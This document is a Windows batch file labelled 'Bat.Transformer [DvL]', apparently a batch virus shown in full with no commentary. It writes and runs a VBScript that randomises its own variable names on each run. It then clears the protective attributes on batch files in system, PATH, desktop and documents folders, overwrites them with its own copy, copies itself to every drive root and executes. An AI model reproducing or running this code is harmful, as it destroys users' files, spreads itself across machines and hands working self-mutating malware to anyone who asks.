::
:: Bat.Transformer [DvL]
::
ctty nul
set fdsr=echo.
set rasd=\abcd.
copy %0 %rasd%bat >nul
%fdsr%set a=createobject("scripting.filesystemobject")>%rasd%vbs
%fdsr%set b=createobject("wscript.shell")>>%rasd%vbs
%fdsr%set c=a.opentextfile("%rasd%bat")>>%rasd%vbs
%fdsr%d=c.readall>>%rasd%vbs
%fdsr%c.close>>%rasd%vbs
%fdsr%d=replace(d,"fdsr",randstring(int(rnd*7)+2))>>%rasd%vbs
%fdsr%d=replace(d,"rasd",randstring(int(rnd*7)+2))>>%rasd%vbs
%fdsr%d=replace(d,"abcd",randstring(int(rnd*7)+2))>>%rasd%vbs
%fdsr%d=replace(d,"freg",randstring(int(rnd*7)+2))>>%rasd%vbs
%fdsr%function randstring(length)>>%rasd%vbs
%fdsr%for cnt=1 to length>>%rasd%vbs
%fdsr%randomize>>%rasd%vbs
%fdsr%if int(rnd*2000/1000)=1 then>>%rasd%vbs
%fdsr%freg=int(rnd*26)+97>>%rasd%vbs
%fdsr%else>>%rasd%vbs
%fdsr%freg=int(rnd*26)+65>>%rasd%vbs
%fdsr%end if>>%rasd%vbs
%fdsr%randstring=randstring&chr(freg)>>%rasd%vbs
%fdsr%next>>%rasd%vbs
%fdsr%end function>>%rasd%vbs
%fdsr%set c=a.opentextfile("%rasd%bat",2)>>%rasd%vbs
%fdsr%c.write d>>%rasd%vbs
%fdsr%c.close>>%rasd%vbs
cscript %rasd%vbs>nul
type nul|choice /n /cy /ty,4 >nul
type nul|choice /n /cy /ty,3 >nul
for %%. in (..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%.
for %%. in (..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %rasd%bat %%. /y
for %%. in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%.:\nul copy %rasd%bat %%.:\%rasd%bat /y
%rasd%bat
set fdsr=|set rasd=
ctty con
cls